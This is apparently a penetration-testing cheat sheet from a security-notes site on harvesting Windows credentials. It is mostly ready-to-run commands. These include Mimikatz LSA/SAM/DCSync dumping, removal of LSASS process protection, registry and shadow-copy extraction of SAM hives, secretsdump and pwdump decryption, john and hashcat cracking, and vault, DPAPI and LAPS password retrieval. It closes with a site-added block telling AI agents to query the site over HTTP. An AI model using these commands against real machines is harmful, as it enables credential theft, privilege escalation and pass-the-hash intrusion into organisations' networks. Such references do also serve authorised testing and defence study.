# Credentials harvesting ## Enumerate Users And Hashes ``` privilege::debug token::elevate lsadump::lsa /inject /name: //NTLM hash of user lsadump::dcsync /user:krbtgt //Hashes of specified user sekurlsa::logonpasswords //NTLM and SHA1 hashes sekurlsa::credman //vault credentials sekurlsa::ekeys /aes128 sekurlsa::ekeys /aes256 vault::cred //vault credentials vault::list //credman plaintext passwords ``` if the logonpassword command returns an error `Handle on memory (0x00000005)` download the library from [here](https://github.com/ParrotSec/mimikatz/raw/master/Win32/mimidrv.sys) (Win32) or [here](https://github.com/ParrotSec/mimikatz/raw/master/x64/mimidrv.sys) (Win64) in the same folder as the mimikaz executable and use the following commands in Mimikatz to disable LSASS protection ``` !+ !processprotect /process:lsass.exe /remove ``` ## Password To NTLM ``` python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "".encode("utf-16le")).digest())' ``` ## SAM ### Dumping #### Manual Administrative privileges are required to dump register keys ``` reg.exe save hklm\sam c:\dp\sam.save reg.exe save hklm\system c:\dp\system.save reg.exe save hklm\security c:\dp\security.save ``` Possible backups location ``` %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system ``` #### ShadowCopy Exploit It is possible to retrieve and dump keys from old backup versions of the system saved with ShadowCopy. Once the backup version is exposed you can dump the SAM credentials and extract DPAPI hashes. All the following operations require Admin privileges Enumerate existing copies ``` vssadmin list shadows ``` Create a new shadowCopy archive ``` wmic shadowcopy call create Volume='C:\' ``` Create a link to the copy 
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\<shadow copy volume name>\
IF you're unable to navigate the link due to access permission errors It is still possible to extract files from the shadow copy ``` copy \\?\GLOBALROOT\Device\\windows\system32\config\sam \sam copy \\?\GLOBALROOT\Device\\windows\system32\config\system \system ``` #### fgdump.exe Runs locally, creates a file with the hashes. ``` fgdump.exe fgdump.exe -t #test for anti-virus presence fgdump.exe -a #don't try to disable anti-virus fgdump.exe -r #ignore existing dump files ``` #### Mimikatz ``` lsadump::sam //SAM database lsadump::secrets //SAM secrets ``` ### Decryption Impacket - secretsdump.py 
secretsdump.py -sam <sam file> -system <system file> LOCAL
secretsdump.py -sam <sam file> -system <system file> -security <sec file> LOCAL
Samdump or Pwdump ``` samdump2 system.save sam.save pwdump SYSTEM SAM > ``` After obtaining the hashes they can be cracked to obtain the passwords or used in Pass the Hash attacks. In order to obtain the passwords we need only the NT part of the hash. given an hash with the following structure `AAAA:BBBB` the actual string to bruteforce is the one to the right of the column ``` john -format=NT -wordlist= hashcat -m 1000 -a 0 --force --show --username #rows follow the format : ``` ## Vault credentials dump Enumerate credentials manager entries ``` vaultcmd /list VaultCmd /listcreds:"" ``` Dump credentials associated with the vault entry ``` $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $VaultObj = new-object Windows.Security.Credentials.PasswordVault $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ } ``` ## DPAPI Usual credential files position ``` %appdata%\Microsoft\Credentials\ %localappdata%\Microsoft\Credentials\ %appdata%\Microsoft\Protect\\ //master key ``` Enumerate Credentials hashes. The parameter `guidMasterKey` reveals the hash of the master key ``` dpapi::cred /in:"" ``` Retrieve the master key, decode it and store the key in cache. In order to decrypt the key we need to be operating under the same context (user, system) the key belongs to. ``` dpapi::masterkey /in:"" dpapi::masterkey /in:"" /rpc dpapi::cache ``` Decrypt other hashes with the master key ``` dpapi::cred /in:"" ``` ## LAPS Verify that LAPS is installed by searching for `admpwd.dll` usually in `C:\Program Files\LAPS\CSE` Check available commands in PowerShell ``` Get-Command *AdmPwd* ``` Find groups allowed to interact with LAPS. If command run with a wildcard argument throws an exception after returning one or more values call the command again but this time specify as identity parameter one of the OUs obtained the first time ``` Find-AdmPwdExtendedRights -Identity * Find-AdmPwdExtendedRights -Identity ``` Get users of the detected group ``` net groups "" ``` Run the following command in the context of a user part of the group allowed to interact with LAPS to dump the stored passwords. The target is the machine with LAPS enabled ``` Get-AdmPwdPassword -ComputerName ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://security-notes.gitbook.io/security-notes/active-directory/local-credentials.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.